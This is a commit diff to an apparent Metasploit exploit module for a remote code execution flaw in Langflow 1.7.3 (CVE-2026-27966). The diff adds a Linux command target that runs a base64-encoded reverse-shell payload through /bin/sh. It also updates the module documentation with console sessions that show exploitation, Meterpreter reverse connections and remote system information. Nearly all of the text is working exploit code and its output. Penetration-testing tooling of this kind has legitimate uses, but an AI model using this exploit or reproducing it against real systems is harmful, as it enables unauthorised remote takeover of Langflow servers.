Update exploit to improve stability

documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md

@@ -78,9 +78,11 @@ Valid ollama model name.
 
 
 ## Scenarios
+
+### cmd/linux/http/x64/meterpreter_reverse_tcp
 ```
 msf > use exploit/multi/http/langflow_rce_cve_2026_27966
-[*] Using configured payload python/meterpreter/reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
 msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
 
 Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
@@ -97,39 +99,85 @@ Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
    VHOST                          no        HTTP server virtual host
 
 
-Payload options (python/meterpreter/reverse_tcp):
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
 
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
+                                              cepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      yVhDYYwMmZm      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Python payload
+   0   Linux Command
 
 
 
 View the full module info with the info, or info -d command.
 
-msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
+oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
-[*] Project: b7717dc4-4cd2-4292-8c26-6ffe8b875aad
-[*] Flow: d712a8b3-8a15-416b-8887-b8792242dc99
-[*] Job: c432a0d8-3667-4f94-b3a2-42cc9e000e15
+[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
+[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
+[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
 [*] Waiting...
-[*] Sending stage (23404 bytes) to 192.168.56.16
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:33598) at 2026-04-08 21:48:58 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
 
 meterpreter > getuid
 Server username: user
 meterpreter > sysinfo
-Computer        : ce88a7f7aecb
+Computer     : d513d5e46402
+OS           : Debian 13.3 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### python/meterpreter/reverse_tcp
+```
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
+[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
+[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
+[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
+[*] Waiting...
+[*] Sending stage (23404 bytes) to 192.168.56.16
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : d513d5e46402
 OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
 Architecture    : x64
 System Language : C

modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb

@@ -29,6 +29,14 @@ class MetasploitModule < Msf::Exploit::Remote
           ['GHSA', '3645-fxcv-hqr4'],
         ],
         'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
           [
             'Python payload',
             {
@@ -133,7 +141,13 @@ class MetasploitModule < Msf::Exploit::Remote
     exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL'])
     exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI'])
     exploit_data = exploit_data.gsub('__FILEPATH__', path)
-    exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode)
+    case target['Arch']
+    when ARCH_PYTHON
+      payload_data = payload.encode
+    else
+      payload_data = "__import__('os').system('echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|/bin/sh')"
+    end
+    exploit_data = exploit_data.gsub('__PAYLOAD__', payload_data)
     exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8))
     # construct POST data
     data = Rex::MIME::Message.new